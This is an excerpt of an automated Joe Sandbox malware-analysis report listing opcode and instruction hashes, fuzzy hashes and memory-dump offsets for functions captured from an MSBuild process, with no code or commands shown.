                                                                                  • Instruction ID: f69687a0e7322922058a7487d02880d78ec11c7a20a161a031931d6f3110744a
                                                                                  • Opcode Fuzzy Hash: 3e1d3820f6fa9f59ede7185d590635a414a0602c0d49e0a648dae303f4bb5875
                                                                                  • Instruction Fuzzy Hash: 6541BF74E00209AFCB44DBB988556AEBBF6FF88710F24856ED44AD7742DA349D42CB90
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2431835837.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_14c0000_MSBuild.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 661a9b0875d2b89aed2de24c45a7413980f1fd3f56427b538e132277f21ca140
                                                                                  • Instruction ID: 217c28cf4012258a50025183f483fce266e4ce025cfe1ce383b32758f9f80a9c
                                                                                  • Opcode Fuzzy Hash: 661a9b0875d2b89aed2de24c45a7413980f1fd3f56427b538e132277f21ca140
                                                                                  • Instruction Fuzzy Hash: FA41C33CB00601CFEBAAAB7E941463B3AA6BB50A04714563EE457C73A4EF34D9418B91
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2431835837.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_14c0000_MSBuild.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1755c8600fcbec82c7b32b342fa23e66f6cb5ab865c6a75cab5464fb825dfc31
                                                                                  • Instruction ID: df4a5e9e026608eb55ecc1e923f6a09378b44b5e6752ae9ea1a53ae9e162fb9a
                                                                                  • Opcode Fuzzy Hash: 1755c8600fcbec82c7b32b342fa23e66f6cb5ab865c6a75cab5464fb825dfc31
                                                                                  • Instruction Fuzzy Hash: 2131933CB00701CFEBA9AF7E941463F7AA6BB50A04704563EA417C73A8EF30D8418B51
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2431835837.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_14c0000_MSBuild.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 62115b41a6935e6f1e7fef787197c457d3c3d1604b968ad3f2f200f717ca82fd
                                                                                  • Instruction ID: e9b5d97fef5a42db401cbddd53a6dd28e14fd2c250d21f34203e4cf8b8a6ec7c
                                                                                  • Opcode Fuzzy Hash: 62115b41a6935e6f1e7fef787197c457d3c3d1604b968ad3f2f200f717ca82fd
                                                                                  • Instruction Fuzzy Hash: 43214B38B005059FE754DBA9C955BAE7BF2FF8CB20F248159E901AB3A5CE719C01CB80
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2428946589.00000000010FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010FD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_10fd000_MSBuild.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d6687f638f790c5e3bddd8e1746284aa0800f558aba38485e1f999c32e6df490
                                                                                  • Instruction ID: ccab86a316496913c2370a68f9afa92d984237a45622e1f1711ff5cb42832218
                                                                                  • Opcode Fuzzy Hash: d6687f638f790c5e3bddd8e1746284aa0800f558aba38485e1f999c32e6df490
                                                                                  • Instruction Fuzzy Hash: 342148B1500200DFDB15DF44D9C5B1ABFA1FB84718F24C1ADDA490F656C336E456CBA2
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2431835837.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_14c0000_MSBuild.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a1e7289f0c5c3327feb71f1833ab18bd7c534f96404227b728d21e2fc4d19895
                                                                                  • Instruction ID: 5fe60a3baba6ae771045b0b1341980bec41244e1070695b9eb6d1b07cb3c189f
                                                                                  • Opcode Fuzzy Hash: a1e7289f0c5c3327feb71f1833ab18bd7c534f96404227b728d21e2fc4d19895
                                                                                  • Instruction Fuzzy Hash: 78118279B006018FD709DF5EE581A46FBD7FBC4614708C22AD108DB759D670F801CB90
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2428946589.00000000010FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010FD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_10fd000_MSBuild.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 14c6bea1b0f6aaacb7db59bffceb06c36f0ab32707ada9f1390ddb9994ea60e7
                                                                                  • Instruction ID: 491822e9342c209a37febfc20a06a1de1161b017e3e4124f4d94c6dc24eaa89d
                                                                                  • Opcode Fuzzy Hash: 14c6bea1b0f6aaacb7db59bffceb06c36f0ab32707ada9f1390ddb9994ea60e7
                                                                                  • Instruction Fuzzy Hash: 4611D272404240CFCB16CF44D5C4B16BFA1FB84314F2881ADD9450B657C336D456CB91
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2431835837.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_14c0000_MSBuild.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b9408f0f9b0a8ff45f6d97fd59b07b1b8b30881c551f0cd31ce5c2f4d751578a
                                                                                  • Instruction ID: cfeac4262d242a0fb0db94794790fe58a1f6fda40534f5ed7a983d21b2b6b59b
                                                                                  • Opcode Fuzzy Hash: b9408f0f9b0a8ff45f6d97fd59b07b1b8b30881c551f0cd31ce5c2f4d751578a
                                                                                  • Instruction Fuzzy Hash: 95110E34B00211CFCB55EB79C815AAE7BF6EF88A1075844BDD406CB32ADA32D802CB80
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2431835837.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_14c0000_MSBuild.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0c0a1f36b900e55b2c7e01fe7b2321bdde6beb07df6153195f78e6774f010b35
                                                                                  • Instruction ID: b05ba173988b75e24c5421068f12d176e5ce036af6581ca3cc618696ab79b263
                                                                                  • Opcode Fuzzy Hash: 0c0a1f36b900e55b2c7e01fe7b2321bdde6beb07df6153195f78e6774f010b35
                                                                                  • Instruction Fuzzy Hash: 6A118B74B00215DFCB55EBBED91566A7BE6AF88A00718447DD406CB329EA35DD02CB90
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2431835837.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_14c0000_MSBuild.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f7932e39d0a7622c8c3eabc81ba975946cc464182e2289786ed62c93f7bf2a91
                                                                                  • Instruction ID: 2cf7b8392e0f1a5fff83604d21ee1ce9f809ec79264e3d72c7cf20d9c527092a
                                                                                  • Opcode Fuzzy Hash: f7932e39d0a7622c8c3eabc81ba975946cc464182e2289786ed62c93f7bf2a91
                                                                                  • Instruction Fuzzy Hash: 7E01D138C00719CFCB1AFBACE89866D7B72FF85300B404239D0125724CEB70A5458B92
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2431835837.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_14c0000_MSBuild.jbxd

Non-executed Functions

Strings
Similarity
• String ID: aq$ aq$xq$#q^$3q^
• API String ID: 0-123231816